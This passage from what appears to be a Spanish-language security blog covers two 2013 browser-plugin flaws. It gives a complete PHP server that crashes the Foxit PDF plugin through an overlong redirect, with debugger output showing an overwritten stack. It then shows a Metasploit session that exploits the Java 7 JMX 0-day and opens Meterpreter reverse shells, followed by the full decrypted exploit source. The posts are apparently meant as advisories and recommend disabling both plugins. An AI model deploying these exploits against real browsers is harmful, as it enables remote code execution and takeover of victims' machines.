    lea edx,[esp+1Ch]
    push L100450D4
    push edx
    mov [esp+25h],al
    call SUB_L10006421
    mov eax,[esp+1Ch]
    lea ecx,[esp+24h]
    push eax
    push L100450D0
    push ecx
    call SUB_L100063CF
    mov eax,[esp+34h]
    mov dl,[esp+30h]
    add esp,00000018h
    mov [ebx+eax],dl
    jmp L100016CE
 L100016C6:
    mov ecx,[esp+1Ch]
    mov byte ptr [ebx+ecx],25h
 L100016CE:
    inc ebx
    mov edi,ebp
    or ecx,FFFFFFFFh
    xor eax,eax
    inc esi
    repne scasb
    not ecx
    dec ecx
    cmp esi,ecx
    jl  L1000164A
 L100016E4:
    mov edx,[esp+1Ch]
    pop edi
    pop esi
    mov eax,00000001h
    mov byte ptr [ebx+edx],00h
    pop ebx
    pop ebp
    pop ecx
    retn
;------------------------------------------------------------------------------

this copy loop ends up in overwriting stack pointers, then 
(by attaching to plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????????
...
Attempt to write to address 41414141
...

also SEH pointers are overwritten
*/

error_reporting(0);

set_time_limit(0);

$port = 6666;

$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
                "Server: Apache\r\n".
                "Location: /x.pdf?".str_repeat("A",1024)."\r\n".
                "Content-Type: text/html\r\n\r\n";

$____boom     = "HTTP/1.1 200 OK\r\n".
                "Server: Apache\r\n".
                "Accept-Ranges: bytes\r\n".
                "Content-Length: 60137\r\n".
                "Content-Type: application/pdf\r\n".
                "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {
  echo "$errstr ($errno)\n";
} else {
  echo "Listening on public tcp port ".$port." \n";  
  while ($conn = stream_socket_accept($socket)) {
    $line=fgets($conn);
    echo $line."\n";
    if (strpos($line,".pdf")){
      fwrite($conn,$____boom);
    }
    else {
      fwrite($conn,$____redirect);
    }
    fclose($conn);
  }
  fclose($socket);
}
?>

 

Ahora ejecutamos el php (x.php en mi ejemplo) desde la línea de comandos de nuestro Windows 7: 

D:\xampplite\htdocs>d:\xampplite\php\php.exe -f x.php
Listening on public tcp port 6666
GET /x.pdf?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP
/1.1
 
Y finalmente apuntamos al puerto y dirección correcta en nuestro navegador: 
 

 
Como podrás ver hemos provocado el crash del plugin sin apenas despeinarnos... 


Actualmente no existe ninguna actualización que lo solucione y otras versiones de Foxit Reader y de otros navegadores (Firefox, Chrome y Safari) podrían ser vulnerables, por lo que se recomienda desactivar el plugin hasta nuevo aviso: 


Al desactivarlo los ficheros PDF no serán abiertos directamente en el navegador y se cargaran en un proceso nuevo de Foxit Reader, evitando así el uso de la DLL vulnerable del plugin. 


Fuente: Vulnerability reported in Foxit PDF plugin for Firefox - how to mitigate it

jueves, 10 de enero de 2013

Nuevo 0-day de Java urge a desactivar el plugin del navegador


Hace unas horas Kafeine nos avisaba en su blog 'Malware don't need Coffee' de un nuevo 0-day que parece afectar a todas las versiones de Java 7 (incluida la actualización 10) y que podría permitir a un atacante ejecutar código arbitrariamente.

De momento no existe un análisis técnico detallado del problema, que parece ser una combinación de dos vulnerabilidades (una de ellas en el API Reflection), pero ya se han identificado numerosos sitios que podrían haber sido comprometidos a principios de año y que contienen este exploit para instalar malware de forma silenciosa (drive-by-download). Basta que el equipo de la víctima utilice un navegador con el plugin de java activado...

Todavía no hay parche de Oracle (el Critical Patch Updates oficial está previsto para el 15 de enero) y el código ya circula por Internet. Además el crimeware no pierde el tiempo para añadirlo a su arsenal: Blackhole, Nuclear Pack, Cool, Redkit... por lo que la única solución pasa por desactivar Java hasta nueva noticia.

Por último, Metasploit también ha añadido el módulo que ya es totalmente funcional:


 Call trans opt: received. 2-19-98 13:24:18 REC:Loc  
   
    Trace program: running  
   
       wake up, Neo...  
     the matrix has you  
    follow the white rabbit.  
   
      knock, knock, Neo.  
   
             (`.     ,-,  
             ` `.  ,;' /  
              `. ,'/ .'  
              `. X /.'  
         .-;--''--.._` ` (  
        .'      /  `  
        ,      ` '  Q '  
        ,     ,  `._  \  
      ,.|     '   `-.;_'  
      : . ` ;  ` ` --,.._;  
       ' `  ,  )  .'  
        `._ , '  /_  
          ; ,''-,;' ``-  
          ``-..__``--`  
   
   
     =[ metasploit v4.6.0-dev [core:4.6 api:1.0]  
 + -- --=[ 1074 exploits - 570 auxiliary - 170 post  
 + -- --=[ 265 payloads - 28 encoders - 8 nops  
   
 msf > use exploit/multi/browser/java_jre17_jmxbean  
 msf exploit(java_jre17_jmxbean) > rexploit  
 [*] Reloading module...  
 [*] Exploit running as background job.  
   
 [*] Started reverse handler on 192.168.1.128:4444   
 [*] Using URL: http://0.0.0.0:8080/j5jwNI  
 [*] Local IP: http://192.168.1.128:8080/j5jwNI  
 [*] Server started.  
 msf exploit(java_jre17_jmxbean) > [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI  
 [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI/  
 [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI/GapYRtBm.jar  
 [*] 192.168.1.147  java_jre17_jmxbean - handling request for /j5jwNI/GapYRtBm.jar  
 [*] Sending stage (30216 bytes) to 192.168.1.147  
 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:2391) at 2013-01-10 20:41:37 +0100  
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI  
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI/  
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI/sNJpvmja.jar  
 [*] 192.168.1.128  java_jre17_jmxbean - handling request for /j5jwNI/sNJpvmja.jar  
 [*] Sending stage (30216 bytes) to 192.168.1.128  
 [*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.128:54260) at 2013-01-10 20:41:47 +0100  
   
 msf exploit(java_jre17_jmxbean) > sessions -i 1  
 [*] Starting interaction with 1...  
   
 meterpreter > sysinfo  
 Computer  : juan-c0de875735  
 OS     : Windows XP 5.1 (x86)  
 Meterpreter : java/java  
 meterpreter > exit  
 [*] Shutting down Meterpreter...  
   
 [*] 192.168.1.147 - Meterpreter session 1 closed. Reason: User exit  
 msf exploit(java_jre17_jmxbean) > sessions -i 2  
 [*] Starting interaction with 2...  
   
 meterpreter > sysinfo  
 Computer  : Juans-MacBook-Pro.local  
 OS     : Mac OS X 10.7.5 (x86_64)  
 Meterpreter : java/java  
 meterpreter > exit  
 [*] Shutting down Meterpreter...  
   
 [*] 192.168.1.128 - Meterpreter session 2 closed. Reason: User exit  


Bonus - código descifrado desde Rusia con amor:


/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
*/

import java.applet.Applet;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

public byte[] hex2Byte(String paramString)
{
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    for (int i = 0; i < arrayOfByte.length; i++)
    {
      arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
    }
    return arrayOfByte;
 }

public static String ByteArrayWithSecOff = & #34;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001
 00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501
 00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578
 63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F
 07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263
 6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F
 457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142
 0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469
 6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F
 50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445
 7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176
 612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A
 6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000
 020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100
 040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600
 02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107
 0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000
 02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600
0000020017";

  public void init()
  {
    try
    {

      byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
      ClassLoader a = null;
      Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
      Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
      localClass3.newInstance();
      Runtime.getRuntime().exec("calc.exe");
    }   
   catch (Throwable ex) {}
  }
 }
Related Posts Plugin for WordPress, Blogger...